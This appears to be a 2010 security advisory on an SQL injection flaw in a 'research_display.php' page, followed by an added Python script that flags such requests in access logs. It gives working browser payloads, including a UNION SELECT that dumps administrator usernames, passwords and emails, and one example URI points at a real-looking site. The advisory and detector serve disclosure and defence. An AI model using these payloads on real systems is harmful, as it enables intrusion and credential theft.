Serendipity 'research_display.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/research_display.php?ID=47 and 1=1

http://www.aarda.org/research_display.php?ID=47 and 1=2

http://www.example.com/research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,group_concat%28user,0x3a,pass,0x3a,email%29,null,null,null+FROM+Admin
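For log review, the two request shapes above (a boolean test appended to a numeric ID, and a UNION SELECT in place of the ID) can be flagged by checking that the ID parameter is a plain integer. The following is an added example, not part of the original advisory; the log format (Apache combined), the sample lines, the response sizes and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; addresses, timestamps and sizes are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2010:10:00:00 +0000] "GET /research_display.php?ID=47 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2010:10:00:05 +0000] "GET /research_display.php?ID=47%20and%201=1 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2010:10:00:06 +0000] "GET /research_display.php?ID=47%20and%201=2 HTTP/1.1" 200 312
203.0.113.9 - - [01/Jan/2010:10:00:09 +0000] "GET /research_display.php?ID=-null+UNiON+ALL+SELECT+null,null+FROM+Admin HTTP/1.1" 200 640
203.0.113.7 - - [01/Jan/2010:10:01:00 +0000] "GET /index.php?ID=abc HTTP/1.1" 200 100
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) (\d+|-)')
TARGET = "/research_display.php"

def classify(value):
    """Return None for a plain integer ID, otherwise a short reason string."""
    if re.fullmatch(r"\d+", value):
        return None
    if re.search(r"\bunion\b.*\bselect\b", value, re.I | re.S):
        return "union-select"
    if re.search(r"\b(and|or)\b\s+\S+\s*=\s*\S+", value, re.I):
        return "boolean-test"
    return "non-numeric"

def suspicious_requests(log_text):
    """Return (client, reason, decoded ID, status, size) for each flagged request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status, size = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(TARGET):
            continue
        # parse_qs decodes %xx and '+', so encoded payloads are compared in clear text
        for key, values in parse_qs(url.query, keep_blank_values=True).items():
            if key.lower() != "id":
                continue
            for value in values:
                reason = classify(value)
                if reason:
                    findings.append((client, reason, value, status, size))
    return findings

if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```

A pair of boolean-test hits from one client with different response sizes is the pattern to look for in the findings, since it indicates the condition is reaching the SQL query.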


 

Copyright 2010, SecurityFocus